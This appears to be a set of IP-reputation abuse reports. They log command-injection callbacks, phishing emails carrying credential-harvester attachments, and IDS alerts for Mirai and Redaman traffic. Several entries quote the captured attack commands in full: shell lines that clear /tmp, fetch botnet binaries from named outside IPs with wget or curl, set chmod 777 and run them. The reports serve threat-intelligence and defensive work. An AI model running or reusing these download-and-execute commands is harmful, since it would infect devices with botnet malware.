Was used in cmd injection attack as a call back IP address.
orf;
cd /tmp;
rm -rf WTF;
wget http: ...
show moreWas used in cmd injection attack as a call back IP address.
orf;
cd /tmp;
rm -rf WTF;
wget http://79.137.198.58/hiddenbin/boatnet.mips;
curl -O http://79.137.198.58/hiddenbin/boatnet.mips;
cat boatnet.mips >WTF;chmod 777 *;
./WTF mips;
wget http://79.137.198.58/hiddenbin/boatnet.mpsl;
curl -O http://79.137.198.58/hiddenbin/boatnet.mpsl;
show less
Subject: [EXTERNAL] AR_Aging_statement
Received: from sv106.wadax.ne.jp (sv106.wadax.ne.jp [211. ...
show moreSubject: [EXTERNAL] AR_Aging_statement
Received: from sv106.wadax.ne.jp (sv106.wadax.ne.jp [211.1.224.76])
by mxsvd01.wadax.ne.jp (Postfix) with ESMTP id 67CF21242CC5
X-IronPort-Outbreak-Status: Phish - Phish
show less
This IP address was an http call back via a cmd injection attempt by ip address 167.99.90.59
UDP/90 ...
show moreThis IP address was an http call back via a cmd injection attempt by ip address 167.99.90.59
UDP/9034 - injection commands were /tmp; rm -rf mpsl; /bin/busybox wget http://140.99.4.20/trc/TRC.mpsl; chmod 777 *; ./TRC.mpsl
show less
Received: from out.smarshmail.com ([199.193.206.138])
Subject: Employee Direct Deposit Processed 0 ...
show moreReceived: from out.smarshmail.com ([199.193.206.138])
Subject: Employee Direct Deposit Processed 07/03/2023
Attachment: Direct-Deposit.html <-- credential Harvester hosted in Russia
https://www.joesandbox.com/analysis/1188723
show less
Received: from mail.praxisglobe.net ([189.206.227.234])
Subject: E-CHECK REMITTANCE FOR Ddcaz PROCE ...
show moreReceived: from mail.praxisglobe.net ([189.206.227.234])
Subject: E-CHECK REMITTANCE FOR Ddcaz PROCESSED 2023-03-07
Attachment: Payment Slip 192362.htm <--- a Credential Harvester fake O365 login
https://www.joesandbox.com/analysis/821543/0/html
show less
UPD/9034 - Command injection attempt from 87.121.221.104 used this IP address 109.206.240.148 in an ...
show moreUPD/9034 - Command injection attempt from 87.121.221.104 used this IP address 109.206.240.148 in an callback.
/bin/busybox wget http://109.206.240.148/bins/mp;
show less
MALWARE-CNC Win.Trojan.Redaman. Infected host tried to make and outbound connection tcp/80 to this I ...
show moreMALWARE-CNC Win.Trojan.Redaman. Infected host tried to make and outbound connection tcp/80 to this IP address
show less
Is a call back IP address in UPD/9034 cmd injection attack - orf;cd /tmp; rm -rf mpsl; /bin/busybox ...
show moreIs a call back IP address in UPD/9034 cmd injection attack - orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://69.165.68.154:8888/download.sh; chmod +x download.sh; ./download.sh realtek; #
show less
Call back IP address in udp/9034 attack by170.64.182.2. orf;cd /tmp; rm -rf void.mpsl; /bin/busybox ...
show moreCall back IP address in udp/9034 attack by170.64.182.2. orf;cd /tmp; rm -rf void.mpsl; /bin/busybox wget http://170.64.182.9/bins/void.mpsl; chmod +x void.mpsl; ./void.mpsl quantum-realtek;
show less
tcp/80 - MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
A Network T ...
show moretcp/80 - MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
A Network Trojan was Detected
show less
Netgear DGN1000 series routers authentication bypass attempt (1:44687:3)
Attempted Administrator P ...
show moreNetgear DGN1000 series routers authentication bypass attempt (1:44687:3)
Attempted Administrator Privilege Gain
show less